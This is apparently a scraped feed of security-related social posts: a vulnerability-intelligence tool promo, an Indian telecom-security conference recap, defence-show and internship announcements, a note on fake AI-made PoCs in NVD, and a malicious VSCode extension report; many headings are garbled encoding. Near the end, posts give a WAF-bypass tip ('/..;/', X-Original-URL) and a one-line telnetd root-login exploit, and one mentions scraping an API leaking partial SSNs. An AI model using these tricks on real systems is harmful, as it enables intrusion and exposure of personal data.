Another bleeding-edge version of VEDAS is out now ๐๐ฅณ
Many network-exploitable vulnerabilities, such as CVE-2025-47188, remains delayed, poorly documented and lack meaningful enrichment. Despite being actively exploited since May 2025, this vulnerability is still not enriched by NVD, EPSS or proprietary vulnerability databases.
VEDAS can be used for Mining Exploit Intelligence linked to vulnerability identifiers like CVE, EUVD, CNNVD, and BDU and can be helpful in developing custom Nuclei templates and extending its coverage, supporting the growing community of security teams, researchers, and ASM providers.
Read More: https://t.co/ZTaFUK9DhJ
๐ง๐ต๐ฒ ๐ฎ๐ฏ๐ถ๐น๐ถ๐๐ ๐๐ผ ๐ป๐ฎ๐๐ถ๐ด๐ฎ๐๐ฒ ๐๐ป๐ฐ๐ฒ๐ฟ๐๐ฎ๐ถ๐ป๐๐ ๐ถ๐ ๐ถ๐ป ๐ผ๐๐ฟ ๐ด๐ฒ๐ป๐ฒ๐. ๐๐ป๐ฑ ๐๐ผ ๐ถ๐ ๐๐ต๐ฒ ๐๐ถ๐น๐น ๐๐ผ ๐๐ฒ๐ฐ๐๐ฟ๐ฒ ๐๐ต๐ฎ๐ ๐๐ฒ'๐๐ฒ ๐ฏ๐๐ถ๐น๐.
Industry. Academia. Defence. One resilient unit. This week's National Conference on Telecom Security in the Era of AI & Quantum Computing, convened by Cyber Security Association of India, brought together some of India's most consequential voices in national security including Mr. Narendra Nath Gangavarapu (Joint Secretary, NSCS), Lt. Gen (Dr.) Rajesh Pant (Former National Cyber Security Coordinator), and Lt. Gen. Vivek Dogra (Signal Officer-in-Chief) shaped a conversation that went far beyond policy.
๐ง๐ต๐ฒ ๐๐ต๐ฟ๐ฒ๐ฎ๐ ๐น๐ฎ๐ป๐ฑ๐๐ฐ๐ฎ๐ฝ๐ฒ ๐ต๐ฎ๐ ๐ณ๐๐ป๐ฑ๐ฎ๐บ๐ฒ๐ป๐๐ฎ๐น๐น๐ ๐ฐ๐ต๐ฎ๐ป๐ด๐ฒ๐ฑ.
National security no longer ends at land, air, and sea. It extends into every network, every chip, every line of code running critical infrastructure. Of India's 8 critical sectors, 2 are super-critical: Power and Telecom. Everything else runs on top of these two.
๐ช๐ฒ ๐บ๐๐๐ ๐ฟ๐ถ๐๐ฒ ๐ฎ๐ฏ๐ผ๐๐ฒ ๐๐ฒ๐ฟ๐ผ-๐ฑ๐ฎ๐๐, ๐ฎ๐ป๐ฑ ๐ฝ๐ฟ๐ฒ๐ฝ๐ฎ๐ฟ๐ฒ ๐ณ๐ผ๐ฟ ๐ค-๐ฑ๐ฎ๐.
The quantum threat is not theoretical. It is a countdown. The National Quantum Mission carries a โน6,000 crore mandate, but security, beyond just cyber, was absent from its original design. That gap must be closed before the clock runs out.
๐ง๐ฒ๐ฐ๐ต๐ป๐ผ๐น๐ผ๐ด๐ ๐ฎ๐น๐ผ๐ป๐ฒ ๐ถ๐ ๐ป๐ผ๐ ๐๐ต๐ฒ ๐ฎ๐ป๐๐๐ฒ๐ฟ. ๐๐บ๐ฝ๐น๐ฒ๐บ๐ฒ๐ป๐๐ฎ๐๐ถ๐ผ๐ป ๐ถ๐.
Bad implementation of great products is itself an attack surface. The guidelines and documentation exist. What is missing is execution, governance frameworks that convert capability into protection. Policy scaffolding is not bureaucracy. It is the difference between a tool and a weapon pointed the right way. The National Cyber Range, built in partnership with Russia, begins operations in July. But a range is only as powerful as the scenarios run on it.
๐ฆ๐ผ๐๐ฒ๐ฟ๐ฒ๐ถ๐ด๐ป๐๐ ๐ฏ๐ฒ๐ด๐ถ๐ป๐ ๐ฎ๐ ๐๐ต๐ฒ ๐ฐ๐ถ๐ฟ๐ฐ๐๐ถ๐ ๐ฏ๐ผ๐ฎ๐ฟ๐ฑ.
PCB design must happen in India, built on Indian components. Equipment that cannot be verified cannot be trusted. The design of our machines is as strategic as the doctrine that deploys them.
๐ง๐ต๐ฒ ๐ต๐๐บ๐ฎ๐ป ๐ฏ๐ฒ๐ต๐ถ๐ป๐ฑ ๐๐ต๐ฒ ๐บ๐ฎ๐ฐ๐ต๐ถ๐ป๐ฒ ๐ถ๐ ๐๐๐ถ๐น๐น ๐ถ๐ฟ๐ฟ๐ฒ๐ฝ๐น๐ฎ๐ฐ๐ฒ๐ฎ๐ฏ๐น๐ฒ.
AI must maximise speed and scale: but ultimate decisions must remain in the hands of a scientist or a general. We must invest in problem-solvers anchored in one sector, trained deeply, trusted fully. GoI is spending thousands of crores on this. That investment must produce long-tenure, sector-dedicated expertise and not generalists cycling across verticals.
These conversations don't happen by accident. Thank you Prof NK Goyal for creating the space and for making sure the right people were in it.
ARPSyndicate is proud to support CSAIโs Cyber Security Centre for Research & Innovations (C3IR) in this initiative.
As part of our involvement with C3IR, we are actively hiring interns for this Offensive Security Research Internship. If you are passionate about CVE analysis, vulnerability research, reverse engineering, embedded security, or low-level software analysis, applications are welcome.
All details are in the link below.
https://t.co/kDqIv5Gozs
We welcome esteemed guest from @arpsyndicate as an Industry Partner for #BharatDefenceTechShow2026 (BDTS 2026).
In an era where cyber dominance, digital warfare, and strategic innovation define national security, ARPSyndicate brings deep expertise in cybersecurity intelligence, threat research, and next-generation defence solutions.
At BDTS 2026, the convergence of:
๐น Innovation
๐น Future Warfare Technologies
๐น Global Collaboration
will drive meaningful dialogue between defence leaders, technology pioneers, policymakers, and global industry stakeholders.
๐ February 16โ17, 2026
๐ Manekshaw Centre, Delhi, India
Together, we strengthen the ecosystem powering #AtmanirbharBharat and next-generation defence readiness.
We look forward to impactful collaborations and strategic partnerships at #BDTS2026.
@DefenceMinIndia@makeinindia@investindia@SpokespersonMoD@DefProdnIndia
#BDTS2026 #BharatDefenceTechShow #DefenceInnovation #CyberSecurity #FutureWarfare #MakeInIndia #DefenceTechnology #StrategicPartnerships #GlobalDefence #MilitaryTechnology #Aerospace #HomelandSecurity #InnovationEcosystem #IndiaDefence #Defe
The API only gets 100 at a time, but I partially vibe coded this script to get beyond that. You can obviously scrape this entire API by refining the code. If someone has access to this, they have access to a wealth of info even if the SSNs are partial. Data brokers love data.
It's crazy how hallucinated AI CVE PoCs keep ending up in @NIST NVD references.
One recent example is CVE-2026-21962, a 10.0 CVE in Oracle HTTP Server / Apache Proxy Plugin.
https://t.co/u33KjhBxTZ links to a GitHub repository with a fake PoC.
This also propagates to @github advisories: https://t.co/37TFXgGpe1
Meanwhile, some blue teams are injecting AI slop rules to prevent this and thinking they are protected, but they are not.
Yes, we've heard a little noise about the semi-popular #ChatMoss#VSCode extension that appears to be malicious. We reported it on 31. Oct 2025, in fact; shortly after we began our ongoing campaign to monitor the VSCode and OpenVSX marketplaces. The extension ID is WhenSunset[.]chatgpt-china ; for whatever reason, in this case the marketplace folks decided to take no action.
It's not new, it's not news, but it is a good reminder to be cautious; marketplace maintainers can be reluctant to remove things without "smoking gun" evidence of malice.
#WhenSunset #VSCodeExtension #Malware #SupplyChainSecurity #OpenSourceSecurity
CVE-2025-2294๐จ
The Gateway was allowing unauthenticated users to inject and execute arbitrary code via SpEL.๐ฅ #bugbountytips :Hit a 403? Use /..;/ or X-Original-URL header to bypass WAF and reach hidden endpoints. ๐ธ
#bugbounty#bugbountytip#EthicalHacking
GNU InetUtils telnetd Argument Injection Authentication Bypass Leads to RCE (CVE-2026-24061)
USER="-f root" telnet -a 127.0.0.1 2323
Try reproduce this issue using #Vulhub
https://t.co/AyvpGABpt7